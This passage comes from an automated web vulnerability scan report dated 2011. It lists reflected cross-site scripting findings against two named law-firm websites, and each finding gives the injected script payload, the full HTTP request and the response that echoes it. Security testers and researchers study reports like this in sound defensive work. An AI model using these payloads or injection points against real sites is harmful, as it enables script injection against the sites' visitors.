This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /web/br.nsf/web52af3"style%3d"x%3aexpression(alert(1))"cdf88022cf4/br.nsf/home_btn_04ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web52af3"style="x:expression(alert(1))"cdf88022cf4/br.nsf/home_btn_04ov.jpg">
...[SNIP]...

4.139. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de641"style%3d"x%3aexpression(alert(1))"3bc42b14411 was submitted in the REST URL parameter 4. This input was echoed as de641"style="x:expression(alert(1))"3bc42b14411 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsfde641"style%3d"x%3aexpression(alert(1))"3bc42b14411/home_btn_04ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsfde641"style="x:expression(alert(1))"3bc42b14411/home_btn_04ov.jpg">
...[SNIP]...

4.140. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ececd"style%3d"x%3aexpression(alert(1))"52b48d08320 was submitted in the REST URL parameter 5. This input was echoed as ececd"style="x:expression(alert(1))"52b48d08320 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_04ov.jpgececd"style%3d"x%3aexpression(alert(1))"52b48d08320 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_04ov.jpgececd"style="x:expression(alert(1))"52b48d08320">
...[SNIP]...

4.141. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceaaf"style%3d"x%3aexpression(alert(1))"ff30546ad01 was submitted in the REST URL parameter 3. This input was echoed as ceaaf"style="x:expression(alert(1))"ff30546ad01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /web/br.nsf/webceaaf"style%3d"x%3aexpression(alert(1))"ff30546ad01/br.nsf/home_btn_05ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - webceaaf"style="x:expression(alert(1))"ff30546ad01/br.nsf/home_btn_05ov.jpg">
...[SNIP]...

4.142. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8aca7"style%3d"x%3aexpression(alert(1))"f20c4010af0 was submitted in the REST URL parameter 4. This input was echoed as 8aca7"style="x:expression(alert(1))"f20c4010af0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf8aca7"style%3d"x%3aexpression(alert(1))"f20c4010af0/home_btn_05ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf8aca7"style="x:expression(alert(1))"f20c4010af0/home_btn_05ov.jpg">
...[SNIP]...

4.143. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d22b2"style%3d"x%3aexpression(alert(1))"06ea3ed31de was submitted in the REST URL parameter 5. This input was echoed as d22b2"style="x:expression(alert(1))"06ea3ed31de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_05ov.jpgd22b2"style%3d"x%3aexpression(alert(1))"06ea3ed31de HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_05ov.jpgd22b2"style="x:expression(alert(1))"06ea3ed31de">
...[SNIP]...

4.144. http://www.hbsr.com/contact_us/index [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /contact_us/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bda6"><script>alert(1)</script>8ad033eb3c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact_us1bda6"><script>alert(1)</script>8ad033eb3c3/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/contact_us1bda6"><script>alert(1)</script>8ad033eb3c3/index-print">
...[SNIP]...

4.145. http://www.hbsr.com/contact_us/index [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /contact_us/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3b5c"><script>alert(1)</script>c3ef65ee739 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact_us/indexd3b5c"><script>alert(1)</script>c3ef65ee739 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/contact_us/indexd3b5c"><script>alert(1)</script>c3ef65ee739-print">
...[SNIP]...

4.146. http://www.hbsr.com/contact_us/index [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /contact_us/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feddf"><script>alert(1)</script>141aece0633 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact_us/index?feddf"><script>alert(1)</script>141aece0633=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/contact_us/index?feddf"><script>alert(1)</script>141aece0633=1&amp;printable=yes">
...[SNIP]...

4.147. http://www.hbsr.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebd51"><script>alert(1)</script>5aa86bd4b74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoebd51"><script>alert(1)</script>5aa86bd4b74 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:21:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/favicon.icoebd51"><script>alert(1)</script>5aa86bd4b74-print">
...[SNIP]...

4.148. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/133-congratulations-finalists-invented-here-celebration-new-england

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ee3"><script>alert(1)</script>d9e5dbdc1f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_eventsf4ee3"><script>alert(1)</script>d9e5dbdc1f3/133-congratulations-finalists-invented-here-celebration-new-england HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.6.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_eventsf4ee3"><script>alert(1)</script>d9e5dbdc1f3/133-congratulations-finalists-invented-here-celebration-new-england-print">
...[SNIP]...

4.149. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/133-congratulations-finalists-invented-here-celebration-new-england

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 816d8"><script>alert(1)</script>9a9e300e5c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/133-congratulations-finalists-invented-here-celebration-new-england816d8"><script>alert(1)</script>9a9e300e5c5 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.6.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england816d8"><script>alert(1)</script>9a9e300e5c5-print">
...[SNIP]...

4.150. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/133-congratulations-finalists-invented-here-celebration-new-england

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b011"><script>alert(1)</script>c99e597bca6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/133-congratulations-finalists-invented-here-celebration-new-england?2b011"><script>alert(1)</script>c99e597bca6=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.6.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:28:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england?2b011"><script>alert(1)</script>c99e597bca6=1&amp;printable=yes">
...[SNIP]...

4.151. http://www.hbsr.com/news_events/index [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee970"><script>alert(1)</script>a8722f44815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_eventsee970"><script>alert(1)</script>a8722f44815/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.5.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_eventsee970"><script>alert(1)</script>a8722f44815/index-print">
...[SNIP]...

4.152. http://www.hbsr.com/news_events/index [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c57c0"><script>alert(1)</script>082bddadd32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/indexc57c0"><script>alert(1)</script>082bddadd32 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
